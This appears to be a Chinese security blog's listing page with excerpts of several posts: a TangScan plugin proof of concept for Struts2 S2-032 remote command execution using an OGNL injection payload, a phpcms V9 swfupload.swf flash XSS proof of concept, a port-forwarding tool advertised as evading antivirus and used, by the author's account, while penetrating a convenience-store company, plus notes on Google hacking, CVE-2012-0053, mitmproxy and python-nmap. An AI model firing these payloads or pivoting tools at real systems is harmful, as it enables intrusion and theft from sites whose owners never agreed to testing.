化学竞赛初赛复习
天呐没想到我化学这么渣的人居然报了个化学竞赛…而且好像再过三星期左右就要考了233…既然报了还是好好考下初赛吧233临阵磨个枪
2016信息技术会考复习题
S2-032 远程命令执行 (POC@Tangscan)
前段时间很火的S2-032 远程命令执行
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 |
import re import string from StringIO import StringIO from thirdparty import requests from modules.exploit import TSExploit from StringIO import StringIO class TangScan(TSExploit): def __init__(self): super(self.__class__, self).__init__() self.info = { "name": "S2-032 远程命令执行", "product": "", "product_version": "", "desc": """ S2-032 远程命令执行 """, "license": self.license.TS, "author": ["系统"], "ref": [ {self.ref.wooyun: "http://zone.wooyun.org/content/26856"}, ], "type": self.type.rce, "severity": self.severity.high, "privileged": False, "disclosure_date": "", "create_date": "" } self.register_option({ "url": { "default": "", "required": True, "choices": [], "convert": self.convert.url_field, "desc": "目标 url" } }) self.register_result({ "status": False, "data": { }, "description": "", "error": "" }) def verify(self): exp_url = self.option.url + "?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23w%3d%23context.get(%23parameters.rpsobj[0]),%23w.getWriter().println(88888888-1),%23w.getWriter().flush(),%23w.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse" try: r = requests.get(exp_url) content = r.content except: content = '' if content.find('88888887') == 0: self.result.status = True self.result.description = "目标 {url} 存在st2命令执行".format( url=self.option.url ) else: try: headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36'} data = {r'reqobj': 'com.opensymphony.xwork2.dispatcher.HttpServletRequest',"rpsobj":"com.opensymphony.xwork2.dispatcher.HttpServletResponse","xxoo":"1"} files = {'test': ('1.jpg', StringIO('1'))} req = requests.Request('POST', self.option.url, headers=headers, data=data,files=files).prepare() req.body = req.body.replace('xxoo', r'method:#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#w=#context.get(#parameters.rpsobj[0]),#w.getWriter().println(88888888-1),#w.getWriter().flush(),#w.getWriter().close(),1?#xx:#request.toStringj') req.headers['Content-Length'] = len(req.body) s = requests.Session() reponse = s.send(req, timeout=10, verify=False, allow_redirects=False) if reponse.content.find('88888887') == 0: self.result.status = True self.result.description = "目标 {url} 存在st2命令执行".format( url=self.option.url ) except Exception,e: print str(e) def exploit(self): pass if __name__ == '__main__': from modules.main import main main(TangScan()) |
PortTransferWindows端口转发
最近学习忙,一直没时间写东西,前段时间渗透某久便利店时发现了个比较好用的端口转发工具,记录分享下。
原文地址:http://bbs.isilic.org/thread-3984-1-1.html
一.前言
lcx是个非常经典的转发工具,但是lcx现在被杀的厉害。而据说,源码免杀才是王道。所以,我产生了自己编写个功能类似lcx的端口转发工具的想法。写完后经过10多天的测试。现在发布正式版v1.0。
二.程序特色(相对lcx.exe而言)
1..不会秒断。(重点)
相信玩过内网,或者服务器3389需要转发的很多人都遇到过一个问题,就是lcx有些时候会秒断,导致以后无法正常远程登录。本程序可以抗秒断,这个是经过实际测试的。有一位机油使用lcx转发,远程登录时秒断,无法正常连接。我上去,使用本程序直接秒杀,连接一直很正常。
2.免杀
写本程序的初衷,是因为lcx被杀的太厉害了,而lcx又很喜欢,我比较喜欢,所以就萌生了自己写一个类似功能的工具的想法。源码免杀才是王道,这是写本程序的出发点。
免杀证明:http://r.virscan.org/report/ab95ca1a134a0a1a9d4c82c387e9fc7a.html
三.程序简介
1.程序说明:我没有读过Lcx的源码,本软件是由我自己构思和编写的,只是功能与lcx.exe类似而已。
2.程序用法:
|
1 2 3 4 5 |
PortTransfer.exe -listen leftPort rightPort -remote leftIp leftPort rightIp rightPort -trans leftPort rightIp rightPort |
3.程序抽象:我把远程连接到目的主机想象成从左到右的连接。mstsc在左,远程主机在右.这样,left与right意思就很明显了,难道不是吗?
4.使用实例:
假设虚拟机中有Windows XP系统,物理主机需要远程连接它。我们可以这样:(假设物理主机IP地址为1.1.1.1)
1).物理机上,执行
|
1 |
PortTransfer.exe -listen 5001 5002 |
2).虚拟机中,执行
|
1 |
PortTransfer.exe -remote 1.1.1.1 5002 127.0.0.1 3389 |
3).物理机中,执行
|
1 |
PortTransfer.exe -trans 6001 127.0.0.1 5001 |
这一步可以不要,也可以使用多次。添加-trans功能,是为了支持多跳转发,2跳,3跳,4跳,等等,应该都是可以的。也就是说,这一步可以执行0次,或者n次.
4).然后,启动mstsc,连接本机 6001 端口,既可连上。
5.支持平台:Windows XP/2003/2003 r2/2008/2008 r2/Vista/7/8。32和64位机器均可以使用。如果以后有需要,可能会发布linux版。至于其他平台,为测试过,如果不支持,也将不予考虑支持。
下载地址
PortTransfer.exe: http://pan.baidu.com/share/link?shareid=386256&uk=1177246384
libmproxy
Request:
|
1 2 3 4 5 6 7 8 9 10 11 |
get_query():得到请求的url的参数,被存放成了字典。 set_query(odict):设置请求的url参数,参数是字典。 get_url():请求的url。 set_url(url):设置url的域。 get_cookies():得到请求的cookie。 headers:请求的header的字典。 content:请求的内容,如果请求时post,那么content就是指代post的参数。 Response的一些方法如下: Headers:返回的header的字典。 Code:返回数据包的状态,比如200,301之类的状态。 Httpversion:http版本。 |
Mitmproxy项目主页:http://mitmproxy.org/
如何优雅的进行Google Hacking
0x00 前言
说到搜索引擎,相信任何人都不会陌生,它包含着我们生活中方方面面的知识,存储着数亿计的信息,每当有人来问我东西的时候我只想说:
越来越多的hack搜索引擎的出现比如Fofa,ZoomEye,Shodan成为了我们渗透时的利器,它们进行合理的分类整理来达到有效利用目的,但在我看来往往信息的复杂程度越高,信息的价值度也回越高,杂乱出奇迹,这也是个真理。
0x01 介绍
Google是一个伟大的信息收集工具,在如今的互联网时代,想想看一个人可以轻易的从搜索引擎中获取你详细的个人信息是件多么叫人激动又害怕的事情。Google也可以当作我们的第二个“社工库”。
搜索引擎的组成:
- 爬行器(机器人、蜘蛛)
- 索引生成器
- 查询检索器
Google基本关键词
|
1 2 3 4 5 6 7 |
Intext 搜索出现的关键词 Inurl 搜索包含关键词的url Intitle 搜索包含关键词的标题 Site 搜索包含关键词的站点 filetype 搜索包含关键词的文件类型 Link 对于页面包含的外部链接搜索 Daterange 搜索特定的日期范围 |
Google基本规则
|
1 2 3 4 5 |
Google 不分大小写 Google 可以使用通配符:*表示一个词/字 Google 会智能地保留一些内容,比如一些过时的词,一些不适合呈现的内容(比如违法信息) 最常用的:"关键字" ,双引号会使Google强制搜索包含关键字的内容 布尔操作符:AND(+) NOT(-) OR(|),AND 现在已不需要,多个关键字google会都匹配到 |
谈谈CVE-2012-0053
0x00 前言
看编号就知道是个比较老的洞了,最近测东西的时候又碰到,找了点资料大致看了下形成原因,然后再分享下POC。
0x01 漏洞描述
Apache HTTP Server 2.2.x多个版本没有正确严格限制HTTP请求头信息,HTTP请求头信息超过LimitRequestFieldSize长度时服务器返回400(Bad Request)错误,并在返回信息中将出错请求头内容爆出,攻击者可以利用该漏洞获取httponly cookies。
受影响软件版本:
Apache Http Server:
Affected: 2.2.21, 2.2.20, 2.2.19, 2.2.18, 2.2.17, 2.2.16, 2.2.15, 2.2.14, 2.2.13, 2.2.12, 2.2.11, 2.2.10, 2.2.9, 2.2.8, 2.2.6, 2.2.5, 2.2.4, 2.2.3, 2.2.2, 2.2.0
细节:
1、当HTTP请求头长度大于apache配置LimitRequestFieldSize长度时,服务器返回400错误页面中会携带LimitRequestFieldSize长度的错误请求头内容,如Cookies,User-agent等。
2、HTTP请求头长度不包含HTTP请求头名称与“:”。
3、Cookies请求头不包含多个cookies之间的空格,为实际多个cookies的长度总和。
4、Apache默认配置LimitRequestFieldSize长度为8196,浏览器正常访问默认截取请求头长度最大为4k
5、任意请求头(不限制于Cookie)超过LimitRequestFieldSize长度,服务器都会返回400错误并显示原始错误请求头信息。
0x02 漏洞分析
在ap_get_mime_headers_core中,该函数对于两种错误http请求的检查返回的信息出现了问题。
1.缺陷代码如下,在检测http_header超长后会返回Bad Request并将错误的部分返回给浏览器
|
1 2 3 4 5 6 7 8 |
field[len - 1] = '\0'; apr_table_setn(r->notes, "error-notes", apr_pstrcat(r->pool, "Size of a request header field " "exceeds server limit.<br />\n" "<pre>\n", ap_escape_html(r->pool, field), "</pre>\n", NULL)); |
2.如果检查HTTP请求头中的某个域不包含冒号,则也返回错误的部分
|
1 2 3 4 5 6 7 8 9 10 11 12 |
if (!(value = strchr(last_field, ':'))) { /* Find ':' or */ r->status = HTTP_BAD_REQUEST; /* abort bad request */ apr_table_setn(r->notes, "error-notes", apr_pstrcat(r->pool, "Request header field is " "missing ':' separator.<br />\n" "<pre>\n", ap_escape_html(r->pool, last_field), "</pre>\n", NULL)); return; } |
nmap from python
0x01 About
大家都比较熟悉nmap,nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络系统安全。
今天分享一下python-nmap,是python的一个模块库,使用这个模块可以让python很方便的操作nmap扫描器来工作,它可以帮助管理员完成自动扫描任务和生成报告的工具,它还支持nmap的脚步输出。
python-nmap只提供了nmap中的端口扫描,但输出方式会让人便于信息整理。
前提:使用python-nmap你得先装有nmap该软件
Install from PIP
|
1 |
pip install python-nmap |
Tangscan插件之phpcms V9 /swfupload.swf XSS
最近看到WooYun-2014-69833报告中对swfupload.swf、uploadify.swf造成的flash xss 分析,由于涉及范围广(国内各大cms厂商,包括但不限于dedecms、phpcms、cmseasy、espcms、phpyun、thinksns、骑士人才系统、phpdisk、国微php168、phpok、kesioncms、pageadmin、xheditor、sdcms、emlog、dtcms等)命中率应该还可以,便给Tangscan提交了几个此类型插件,这里也分享一下代码。
先看下漏洞成因
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 |
this.movieName = root.loaderInfo.parameters.movieName; this.flashReady_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].flashReady"); this.fileDialogStart_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].fileDialogStart"); this.fileQueued_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].fileQueued"); this.fileQueueError_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].fileQueueError"); this.fileDialogComplete_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].fileDialogComplete"); this.uploadStart_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].uploadStart"); this.uploadProgress_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].uploadProgress"); this.uploadError_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].uploadError"); this.uploadSuccess_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].uploadSuccess"); this.uploadComplete_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].uploadComplete"); this.debug_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].debug"); this.testExternalInterface_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].testExternalInterface"); this.cleanUp_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].cleanUp"); |
代码可见,从参数(root.loaderInfo.parameters.movieName)中获得movieName后直接赋值到一些callback响应函数中,这些函数是js中执行的内容。我们只需闭合前面的”],再闭合try..catch中大括号},即可执行自己的javascript代码,造成反射型XSS。
因为是flash xss,而且没有过多关键字,所以无视浏览器filter和大部分WAF(因为在前端运行),所以影响较大,轻则越权操作、产生XSS、csrf蠕虫,重则直接getshell(结合某些cms的后台getshell技巧)。
分享下phpcms V9 /swfupload.swf XSS POC
- TangScan-ID:TS-2014-17843
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 |
#! /usr/bin/env python # -*- coding: utf-8 -*- import md5 from thirdparty import requests from modules.exploit import TSExploit class TangScan(TSExploit): def __init__(self): super(self.__class__, self).__init__() self.info = { "name": "phpcms V9 /swfupload.swf XSS", "product": "phpcmsv9", "product_version": "", "desc": """ phpcms V9 /swfupload.swf XSS """, "license": self.license.TS, "author": ["侦探911"], "ref": [ {self.ref.wooyun: "http://www.wooyun.org/bugs/wooyun-2014-069833"}, ], "type": self.type.xss, "severity": self.severity.low, "privileged": False, "disclosure_date": "", "create_date": "" } self.register_option({ "url": { "default": "", "required": True, "choices": [], "convert": self.convert.url_field, "desc": "" } }) self.register_result({ "status": False, "data": { }, "description": "", "error": "" }) def md5(self, content): return md5.new(content).hexdigest() def verify(self): flash_md5 = "3a1c6cc728dddc258091a601f28a9c12" exp_url = "{domain}/statics/js/swfupload/swfupload.swf".format(domain=self.option.url.rstrip('/')) try: response = requests.get(exp_url, verify=False, timeout=15) except Exception, e: self.result.error = str(e) return if self.md5(response.content) == flash_md5: self.result.status = True self.result.description = "目标 {url} 存在反射XSS, 验证url: {verify_url}".format( url=self.option.url, verify_url=exp_url + "?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}//" ) def exploit(self): self.verify() if __name__ == '__main__': from modules.main import main main(TangScan()) |
浅谈结构体
0x00 前言/概述
什么是结构体?为了便于引用数据,有时需要用不同的数据组合成一个有机的整体,而这样的整体中则是互相影响,相互联系。比如一个人的基本资料:编号,姓名,性别,地址(如下)。c语言中把这样自己指定的组合项称为结构体(structure)。
| num | name | sex | addr |
| 1 | Ruilin | M | Shanxi |
近期评论